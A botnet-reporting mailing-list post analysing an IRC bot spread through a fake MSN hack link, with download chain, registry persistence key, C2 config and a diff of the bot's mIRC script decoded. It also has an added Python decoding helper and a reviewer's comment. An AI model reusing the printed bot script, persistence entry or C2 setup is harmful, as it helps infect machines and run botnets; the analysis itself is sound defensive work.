To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
See attached message. reaLcoder and VoLKaN appear to be behind these.
A diff of winner1 showing the decoded strings is also attached. If anyone needs a copy of the bot, please let me know and I'll be happy to send it along.

-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
--- Begin Message ---
Sent by a listmember in #irc-security on Nightstar:

19:48:15 <ANK-37M> Msn Messenger Hack v4 >>> www.Hackmsn.no.tp (Update 08/10/06) 100% work now !
19:48:56 <ANK-37M> Msn Messenger Hack v4 >>> www.Hackmsn.no.tp (Update 08/10/06) 100% work now !
19:48:57 <edanur__> Msn Messenger Hack v4 >>> www.Hackmsn.no.tp (Update 08/10/06) 100% work now !

This leads to http://members.lycos.co.uk/sence/msn.exe which is a zipsfx package containing:

  Length    Date    Time    Name
 --------    ----    ----    ----
     1705  07-14-06  21:07   xcopy.hta
      165  07-14-06  21:09   sfx.ini
 --------                    -------
     1870                    2 files

According to sfx.ini, xcopy.hta is dropped in c:\windows\help. xcopy.hta is vbscript which downloads http://bicirik.net/chat.exe to c:\windows\system32\chat.exe and executes it.

chat.exe is another zipsfx package containing the following files:

  Length    Date    Time    Name
 --------    ----    ----    ----
      309  07-14-06  01:25   remote.ini
    40960  03-25-06  16:25   winerr.dll
      153  07-28-06  21:56   flk23.reg
      121  03-25-06  16:25   hell
     9735  03-25-06  16:25   swins.xt
  1835267  03-25-06  16:25   win.exe
     2878  07-28-06  21:56   mirc.ini
    27093  07-28-06  21:56   winner1
      164  07-28-06  21:57   sfx.ini
 --------                    -------
  1916680                    9 files

sfx.ini appears to extract the bot to c:\windows\fonts and execute win.exe (mIRC).
The only files clamav detects anything wrong with are:

./winerr.dll: Trojan.Flood.I FOUND
./winner1: Worm.Randon-7 FOUND

Interesting highlights from several files:

mirc.ini:

[Mirc]
host=irc.darbe.infoSERVER:irc.darbe.info:8089
user=gfhg
email=jhgj
nick=[XP-6576446]
anick=[XP-4921729]

flk23.reg:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Win"="C:\\Documents and Settings\\VoLKaN\\Desktop\\Yeni Klas?r\\win.exe"

remote.ini:

[variables]
n0=%reaLcoder 73
n1=%filetoboot flk23.reg
n2=%a 1
n3=%many 2
n4=%infecttime Thursday 16/02/2006 17:53:25
n5=%fnick 10
n6=%b Online
n7=%c www.Darbe.info
n8=%d [EMAIL PROTECTED]
n9=%e .NET Messenger Service
n10=%x 0
n11=%cserver irc.darbe.info
n12=%cport 7574
n13=%QHTread :Welcome

www.hackmsn.no.tp resolves to 213.239.203.47 (talentunion.de).
bicirik.net resolves to 66.90.122.3 (FDCServers)

whois on 66.90.122.3:

network:Auth-Area:66.90.64.0/18
network:Class-Name:network
network:OrgName:goksel
network:OrgID;I:GOKSEL-MELEKORG
network:Address:gazi mah 1124 no
network:City:istanbul
network:StateProv:N/A
network:PostalCode:34120
network:Country:TURKEY
network:NetRange:66.90.122.0-66.90.122.31
network:CIDR:66.90.122.0/27
network:NetName:GOKSEL-MELEKORG
network:OrgAbuseHandle:FDCservers Customer
network:OrgAbuseName:goksel
network:OrgAbusePhone:+90 216 567 95 85
network:OrgAbuseEmail:[EMAIL PROTECTED]

irc.darbe.info resolves to 89.149.202.34 (dakikhost.com / Netdirekt.de)

-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
signature.asc
Description: Digital signature

_______________________________________________
irc-security mailing list
[EMAIL PROTECTED]
http://lists.irc-unity.org/mailman/listinfo/irc-security
--- End Message ---
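The forwarded analysis recovers the bot's connection details from two places: the %cserver/%cport variables in remote.ini, and base64 payloads that the mIRC script hides behind $decode(<text>,m) (the m switch is mIRC's MIME, i.e. base64, decoder). The following Python is an added triage helper, not PinkFreud's tooling or anything shipped with the bot; it expands the $decode() calls into plaintext literals and pulls the [variables] section apart so the indicators can be compared side by side. The sample script fragment and remote.ini excerpt are constructed from strings quoted in the message, and the value QQ is a deliberately invalid payload to exercise the error path.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample in the style of the winner1 script: connection
# parameters hidden behind mIRC's $decode(<text>,m) (MIME/base64).
# The "QQ" entry is constructed as invalid base64 to show error handling.
SAMPLE_SCRIPT = """\
alias rds {
 if ($1 = sr) { return $decode(aXJjLmRhcmJlLmluZm8=,m) }
 if ($1 = sp) { return $decode(ODA4OQ==,m) }
 if ($1 = sc) { return $decode(I3dhcmV6,m) }
 if ($1 = xx) { return $decode(QQ,m) }
}
"""

# Constructed excerpt of a remote.ini [variables] section, using the
# variable names quoted in the message.
SAMPLE_REMOTE_INI = """\
[variables]
n0=%reaLcoder 73
n1=%filetoboot flk23.reg
n11=%cserver irc.darbe.info
n12=%cport 7574
"""

# Matches $decode(<base64 payload>,m); the payload is captured as group 1.
DECODE_RE = re.compile(r"\$decode\(([A-Za-z0-9+/=]+),m\)")


def decode_mime_token(token: str) -> Optional[str]:
    """Decode one base64 payload; return None when it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def decode_mirc_strings(script: str) -> dict:
    """Map every $decode(<b64>,m) payload in the script to its plaintext
    (None for payloads that do not decode)."""
    return {token: decode_mime_token(token) for token in DECODE_RE.findall(script)}


def expand_decodes(script: str) -> str:
    """Rewrite the script with decoded literals in place; a payload that
    fails to decode is left as the original $decode(...) call."""
    def repl(match: "re.Match") -> str:
        plain = decode_mime_token(match.group(1))
        return match.group(0) if plain is None else plain
    return DECODE_RE.sub(repl, script)


def parse_mirc_variables(ini_text: str) -> dict:
    """Parse the [variables] section of an mIRC remote.ini.

    Entries have the form 'nN=%name value'; the 'nN=' index is dropped and
    the leading '%' is stripped from the variable name."""
    variables = {}
    in_section = False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[variables]"
            continue
        if not in_section or "=" not in line:
            continue
        _, _, payload = line.partition("=")
        name, _, value = payload.partition(" ")
        if name.startswith("%"):
            variables[name[1:]] = value
    return variables


def c2_summary(ini_text: str, script: str) -> dict:
    """Put the indicators an analyst wants next to each other: the
    %cserver/%cport variables and every string the script hides in $decode."""
    variables = parse_mirc_variables(ini_text)
    decoded = [v for v in decode_mirc_strings(script).values() if v is not None]
    return {
        "ini_server": variables.get("cserver"),
        "ini_port": variables.get("cport"),
        "decoded_literals": decoded,
    }


if __name__ == "__main__":
    print(expand_decodes(SAMPLE_SCRIPT))
    print(c2_summary(SAMPLE_REMOTE_INI, SAMPLE_SCRIPT))
```

Run against the real winner1 and remote.ini, the expanded script is the same view the attached diff gives by hand, and the summary makes the two different ports (8089 in the script and mirc.ini, 7574 in remote.ini) visible at a glance.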
--- winner1.orig 2006-07-28 21:56:06.000000000 -0400
+++ winner1 2006-08-12 16:12:05.000000000 -0400
@@ -183,11 +183,11 @@
alias s33 { if ($appactive = $true) { /exit } }
on *:connect:{ hostnick | .timerjc 0 $rand(2,20) /jc | .timercheck off |
.timer 0 30 /jc | .inc %reaLcoder | if (%reaLcoder = 1) { .saym $rds(rc) iam
New owned - $ip - $host - $uptime(system,2) | .pdcc on | .fsend on | .clearall
} }
alias rds {
- if ($1 = sr) { return $decode(aXJjLmRhcmJlLmluZm8=,m) }
- if ($1 = sp) { return $decode(ODA4OQ==,m) }
- if ($1 = sc) { return $decode(I3dhcmV6,m) }
- if ($1 = sk) { return $decode(QnVzZW0=,m) }
- if ($1 = rc) { return $decode(I3dhcmV6,m) }
+ if ($1 = sr) { return irc.darbe.info }
+ if ($1 = sp) { return 8089 }
+ if ($1 = sc) { return #warez }
+ if ($1 = sk) { return Busem }
+ if ($1 = rc) { return #warez }
}
alias hostnick {
if (.edu isin $host) || (.ad. isin $host) || (.ac. isin $host) || (.cc. isin
$host) || (uni isin $host) && (wk isin $uptime(system,2)) { nick [edu-wk- $+
$r(1000,9999) $+ $r(100,999) $+ ]] | goto end }
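Review bot: the decoded replacements in the rds alias are consistent with the rest of the sample, which is worth stating in the accompanying text: `+ if ($1 = sr) { return irc.darbe.info }` and `+ if ($1 = sp) { return 8089 }` match the SERVER:irc.darbe.info:8089 entry in mirc.ini, and the `sc` and `rc` cases carry the identical base64 payload (I3dhcmV6), so both decode to #warez. The reading of `sk` (Busem) as a channel key follows only from the name of the switch; nothing in this hunk shows how $rds(sk) is used, so it should be labelled as an inference. The trailing hostnick context is cut off before the `:end` label that the `goto end` refers to, which is expected for an 11-line hunk but means the alias cannot be judged from this excerpt.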
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
